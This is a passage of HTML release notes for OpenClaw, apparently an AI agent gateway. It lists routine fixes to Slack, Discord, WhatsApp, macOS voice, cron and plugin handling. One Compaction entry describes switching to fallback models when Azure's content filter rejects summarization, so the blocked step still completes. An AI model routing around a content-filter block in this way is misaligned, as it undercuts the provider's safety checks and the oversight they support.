<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Slack/directory: make <code>openclaw directory peers/groups list --channel slack</code> prefer token-backed live readers and return the connected Slack account from <code>directory self</code>, so valid Slack tokens no longer produce empty directory CLI results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105363396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50776/hovercard" href="https://github.com/openclaw/openclaw/issues/50776">#50776</a>. Thanks @pjaillon.</p>
</li>
<li>
<p>Slack: keep assistant typing status, temporary typing reactions, and status reactions active for group/channel turns that use message-tool-only visible replies, while still suppressing automatic source replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367334076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75877/hovercard" href="https://github.com/openclaw/openclaw/issues/75877">#75877</a>. Thanks @teosborne.</p>
</li>
<li>
<p>Slack: recover full inbound DM text from top-level rich-text blocks when Slack sends a shortened message preview, so long direct messages still reach the agent intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147105482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55358/hovercard" href="https://github.com/openclaw/openclaw/issues/55358">#55358</a>. Thanks @tonyjwinter.</p>
</li>
<li>
<p>Replies: strip legacy <code>[TOOL_CALL]{tool =&gt; ..., args =&gt; ...}[/TOOL_CALL]</code> pseudo-call text from user-facing replies and flag it in tool-call diagnostics instead of showing raw tool syntax in channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230337239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63610/hovercard" href="https://github.com/openclaw/openclaw/issues/63610">#63610</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>WhatsApp: close long-lived web sockets through Baileys <code>end(error)</code> before falling back to raw websocket close, so listener teardown runs Baileys cleanup instead of leaving zombie sockets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116852446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52442" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52442/hovercard" href="https://github.com/openclaw/openclaw/issues/52442">#52442</a>. Thanks @essendigitalgroup-cyber.</p>
</li>
<li>
<p>Twitch/plugins: emit a flat JSON Schema for Twitch channel config so single-account and multi-account configs validate before runtime load, and add source-checkout diagnostics for missing pnpm workspace dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: move hot transcript reads and mirror appends onto async bounded IO with serialized parent-linked writes, keeping large session histories from stalling Gateway requests and channel replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364571913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75656/hovercard" href="https://github.com/openclaw/openclaw/issues/75656">#75656</a>. Thanks @DerFlash.</p>
</li>
<li>
<p>macOS/Talk Mode: downmix multi-channel microphone buffers before handing them to Apple Speech across Push-to-Talk, Talk Mode, Voice Wake, and the wake-word tester, so pro audio interfaces no longer produce empty transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054504623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42533/hovercard" href="https://github.com/openclaw/openclaw/issues/42533">#42533</a>. Thanks @jbuecker.</p>
</li>
<li>
<p>macOS/Talk Mode: subscribe native WebChat to active-session transcript updates and render external spoken user turns in the chat thread instead of only showing assistant replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359538657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75155/hovercard" href="https://github.com/openclaw/openclaw/issues/75155">#75155</a>. Thanks @SledderBling.</p>
</li>
<li>
<p>macOS/Voice Wake: accept trigger-only phrases in the built-in Voice Wake test, matching the settings UI and runtime trigger-only path instead of requiring extra command text after the wake word. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245638367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64986/hovercard" href="https://github.com/openclaw/openclaw/issues/64986">#64986</a>. Thanks @zoiks65.</p>
</li>
<li>
<p>Cron/TTS: run cron announce payloads through the normal TTS directive transform before outbound delivery, so scheduled <code>[[tts]]</code> replies generate voice payloads instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115170457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52125/hovercard" href="https://github.com/openclaw/openclaw/issues/52125">#52125</a>. Thanks @kenchen3000.</p>
</li>
<li>
<p>WhatsApp: save downloadable quoted image media from reply context as inbound media, so agents can inspect an image that a user replied to instead of only seeing <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188698212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59174/hovercard" href="https://github.com/openclaw/openclaw/issues/59174">#59174</a>. Thanks @gaffner.</p>
</li>
<li>
<p>Sessions/store: stop persisting the runtime-only <code>skillsSnapshot.resolvedSkills</code> array inside each session entry, so <code>sessions.json</code> no longer carries a copy of every parsed <code>SKILL.md</code> body for every active session; <code>ensureSkillSnapshot</code> rehydrates the array from disk on cold resume so the embedded runner, the Claude CLI skills plugin, and the Claude live-session fingerprint all see populated skills, and legacy stores self-heal on the next save. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3913009724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11950/hovercard" href="https://github.com/openclaw/openclaw/issues/11950">#11950</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3883150285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6650" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6650/hovercard" href="https://github.com/openclaw/openclaw/issues/6650">#6650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934112753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/15000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/15000/hovercard" href="https://github.com/openclaw/openclaw/issues/15000">#15000</a>. Thanks @amoghasgekar.</p>
</li>
<li>
<p>Doctor/WhatsApp: warn when Linux crontabs still run the legacy <code>ensure-whatsapp.sh</code> health check, which can misreport <code>Gateway inactive</code> when cron lacks the systemd user-bus environment. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4199567980" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60204/hovercard" href="https://github.com/openclaw/openclaw/issues/60204">#60204</a>. Thanks @mySebbe.</p>
</li>
<li>
<p>Slack/setup: print the generated app manifest as plain JSON instead of embedding it inside the framed setup note, so it can be copied into Slack without deleting border characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251790246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65751/hovercard" href="https://github.com/openclaw/openclaw/issues/65751">#65751</a>. Thanks @theDanielJLewis.</p>
</li>
<li>
<p>Channels/WhatsApp: route CLI logout through the live Gateway and stop runtime-backed listeners before channel removal, so removing a WhatsApp account does not leave the old socket replying until restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277177561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67746" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67746/hovercard" href="https://github.com/openclaw/openclaw/issues/67746">#67746</a>. Thanks @123Mismail.</p>
</li>
<li>
<p>Voice Call/Twilio: honor TTS directive text and provider voice/model overrides during telephony synthesis, so <code>[[tts:...]]</code> tags are not spoken literally and voiceId overrides reach OpenAI/ElevenLabs calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58114/hovercard" href="https://github.com/openclaw/openclaw/issues/58114">#58114</a>. Thanks @legonhilltech-jpg.</p>
</li>
<li>
<p>Agents/session-locks: reclaim untracked current-process session locks with matching starttime during acquisition and startup cleanup, so Gateway restarts recover from self-owned orphan <code>.jsonl.lock</code> files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366526190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75805" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75805/hovercard" href="https://github.com/openclaw/openclaw/issues/75805">#75805</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093489842" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49603/hovercard" href="https://github.com/openclaw/openclaw/issues/49603">#49603</a>. Thanks @cdznho.</p>
</li>
<li>
<p>Agents/subagents: initialize built-in context engines before native <code>sessions_spawn</code> resolves spawn preparation, so cliBackend-only cold starts no longer fail with an unregistered <code>legacy</code> context engine. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339592375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73095/hovercard" href="https://github.com/openclaw/openclaw/issues/73095">#73095</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347197163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73904/hovercard" href="https://github.com/openclaw/openclaw/pull/73904">#73904</a>) Thanks @brokemac79.</p>
</li>
<li>
<p>Plugins/Bonjour: ship the ciao runtime dependency with packaged OpenClaw so fresh OCM envs can start default mDNS discovery without a missing-module failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/tools: scope reply plugin-tool discovery to manifest-declared tool owners and already-active matching tool entries, avoiding broad plugin runtime loading for narrow or core-only tool allowlists. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/replies: defer implicit image model discovery and keep OAuth auth-store adoption on persisted profiles during reply startup, cutting OCM MarCodex warm prep to sub-second in live checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: enforce <code>contracts.tools</code> as the manifest ownership contract for plugin tool registration, rejecting undeclared runtime tool names and adding bundled plugin drift coverage. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Agents/Codex: stop prompting message-tool-only source turns to finish with <code>NO_REPLY</code>, so quiet turns are represented by not calling the visible message tool instead of conflicting final-text instructions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Gateway/config: report failed backup restores as failed in logs and config observe audit records instead of marking them valid. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314005687" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70515/hovercard" href="https://github.com/openclaw/openclaw/pull/70515">#70515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Compaction: use the active session model fallback chain for implicit summarization failures without persisting fallback model selection, so Azure content-filter 400s can recover. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245460651" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64960" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64960/hovercard" href="https://github.com/openclaw/openclaw/issues/64960">#64960</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352068136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74470/hovercard" href="https://github.com/openclaw/openclaw/pull/74470">#74470</a>) Thanks @jalehman and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</p>
</li>
<li>
<p>Gateway/config: allow <code>gateway config.patch</code> to update documented subagent thinking defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365780380" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75764" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75764/hovercard" href="https://github.com/openclaw/openclaw/issues/75764">#75764</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366498289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75802" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75802/hovercard" href="https://github.com/openclaw/openclaw/pull/75802">#75802</a>) Thanks @kAIborg24.</p>
</li>
<li>
<p>Plugins/CLI: keep git plugin install paths credential-free, preserve existing git checkouts until replacement succeeds, honor duplicate npm install mode, and remove managed git repos on uninstall. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: redact authenticated git URLs from git install command failure details, so failed clone or checkout output cannot leak credentials during plugin installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/status reactions: remove stale non-terminal lifecycle reactions when a run reaches done or error, so Discord does not leave a permanent thinking emoji after completion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363092374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75458/hovercard" href="https://github.com/openclaw/openclaw/issues/75458">#75458</a>. Thanks @davelutztx.</p>
</li>
<li>
<p>Discord/doctor: migrate unsupported per-channel <code>agentId</code> entries under guild channel config into top-level <code>bindings[]</code> routes, so <code>openclaw doctor --fix</code> preserves the intended agent route instead of stripping it as an unknown key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217423565" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62455/hovercard" href="https://github.com/openclaw/openclaw/issues/62455">#62455</a>. Thanks @lobster-biscuit.</p>
</li>
<li>
<p>Discord/DMs: set inbound direct-message <code>ctx.To</code> to the semantic <code>user:&lt;id&gt;</code> target while keeping delivery routed through the DM channel, so mirror and recovery paths do not treat DMs as channel conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4282995155" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68126" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68126/hovercard" href="https://github.com/openclaw/openclaw/issues/68126">#68126</a>. Thanks @illuminate0623.</p>
</li>
<li>
<p>Discord/DMs: keep no-guild inbound messages on direct-message routing when Discord channel lookup is temporarily unavailable, preventing degraded DMs from forking into channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195831671" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59817" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59817/hovercard" href="https://github.com/openclaw/openclaw/issues/59817">#59817</a>. Thanks @DooPeePey.</p>
</li>
<li>
<p>Discord: retry outbound API calls on HTTP 5xx, request-timeout, and transient transport failures instead of only Discord rate limits, reducing dropped cron and agent replies during short Discord or network outages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116577020" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52396/hovercard" href="https://github.com/openclaw/openclaw/issues/52396">#52396</a>. Thanks @sunshineo.</p>
</li>
<li>
<p>Discord: include Components v2 Text Display content from referenced replies and forwarded snapshots, so component-only messages still appear in reply context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158079453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56228" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56228/hovercard" href="https://github.com/openclaw/openclaw/issues/56228">#56228</a>. Thanks @HollandDrive.</p>
</li>
<li>
<p>Discord: add configurable gateway READY timeouts for startup and runtime reconnects, so staggered multi-account setups can avoid false restart loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331372526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72273/hovercard" href="https://github.com/openclaw/openclaw/issues/72273">#72273</a>. Thanks @sergionsantos.</p>
</li>
<li>
<p>Discord: preserve native slash-command description localizations through command reconcile, so localized Discord descriptions no longer get overwritten by English defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161405333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56580" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56580/hovercard" href="https://github.com/openclaw/openclaw/issues/56580">#56580</a>. Thanks @mhseo93.</p>
</li>
<li>
<p>Discord: add configured outbound mention aliases so known <code>@Name</code> references can be rewritten to real Discord user mentions instead of relying only on the transient directory cache. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274166014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67587/hovercard" href="https://github.com/openclaw/openclaw/issues/67587">#67587</a>. Thanks @McoreD.</p>
</li>
<li>
<p>Discord: avoid startup REST amplification by skipping native command deploy retries after Discord rate limits and deriving the bot id from parseable bot tokens instead of requiring a <code>/users/@me</code> lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362306201" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75341" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75341/hovercard" href="https://github.com/openclaw/openclaw/issues/75341">#75341</a>. Thanks @PrinceOfEgypt.</p>
</li>
<li>
<p>Plugins/hooks: derive hook <code>ctx.channelId</code> from the conversation target instead of the provider name, so Discord and other channel plugins can keep per-channel state isolated. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196584916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59881/hovercard" href="https://github.com/openclaw/openclaw/issues/59881">#59881</a>. Thanks @bradfreels.</p>
</li>
<li>
<p>Gateway/config: log config health-state write failures instead of silently hiding config observe-recovery write errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Diagnostics: reset stuck-session timers on reply, tool, status, block, and ACP progress events, and back off repeated <code>session.stuck</code> diagnostics while a session remains unchanged. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330206713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72010" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72010/hovercard" href="https://github.com/openclaw/openclaw/pull/72010">#72010</a>. Thanks @rubencu.</p>
</li>
<li>
<p>Gateway/agents: avoid rebuilding core tools for plugin-only allowlists and keep the full plugin registry cache warm across scoped plugin loads, reducing per-turn latency spikes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367404227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75882/hovercard" href="https://github.com/openclaw/openclaw/issues/75882">#75882</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367580317" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75907" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75907/hovercard" href="https://github.com/openclaw/openclaw/issues/75907">#75907</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367573379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75906/hovercard" href="https://github.com/openclaw/openclaw/issues/75906">#75906</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367498934" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75887" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75887/hovercard" href="https://github.com/openclaw/openclaw/issues/75887">#75887</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367081946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75851/hovercard" href="https://github.com/openclaw/openclaw/issues/75851">#75851</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367733132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75922/hovercard" href="https://github.com/openclaw/openclaw/pull/75922">#75922</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/failover: classify bare <code>status: internal server error</code> provider messages as retryable server errors so model fallback can rotate instead of stopping. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346697764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73844" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73844/hovercard" href="https://github.com/openclaw/openclaw/pull/73844">#73844</a>) Thanks @thesomewhatyou.</p>
</li>
<li>
<p>Gateway/startup: return the shared retryable startup-sidecars error for startup-gated control-plane RPCs such as sessions.create, sessions.send, sessions.abort, agent.wait, and tools.effective, so clients can retry early sidecar races. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368487370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76012" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76012/hovercard" href="https://github.com/openclaw/openclaw/pull/76012">#76012</a>) Thanks @scoootscooob.</p>
</li>
<li>
<p>Providers/Google: fix Gemini 2.5 Flash-Lite <code>reasoning: "minimal"</code> rejections by raising its thinking-budget floor to 512 while preserving the existing Gemini 2.5 Pro and Flash minimal presets. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316577583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70629" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70629/hovercard" href="https://github.com/openclaw/openclaw/pull/70629">#70629</a>) Thanks @ericberic.</p>
</li>
<li>
<p>Agents/status: resolve <code>session_status(sessionKey="current")</code> for sparse channel-plugin sessions after literal current lookups miss, so Scope, Slack, Discord, and other plugin-driven agents avoid retrying through <code>Unknown sessionKey: current</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348384116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74141" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74141/hovercard" href="https://github.com/openclaw/openclaw/issues/74141">#74141</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331560781" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72306" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72306/hovercard" href="https://github.com/openclaw/openclaw/pull/72306">#72306</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</p>
</li>
<li>
<p>Cron: retry recurring wake-now main-session jobs through temporary heartbeat busy skips before recording success, so queued cron events no longer appear as ok ghost runs while the main lane is still busy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368042745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75964" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75964/hovercard" href="https://github.com/openclaw/openclaw/issues/75964">#75964</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369011338" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76083" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76083/hovercard" href="https://github.com/openclaw/openclaw/pull/76083">#76083</a>) Thanks @kshetrajna12 and @xuruiray.</p>
</li>
<li>
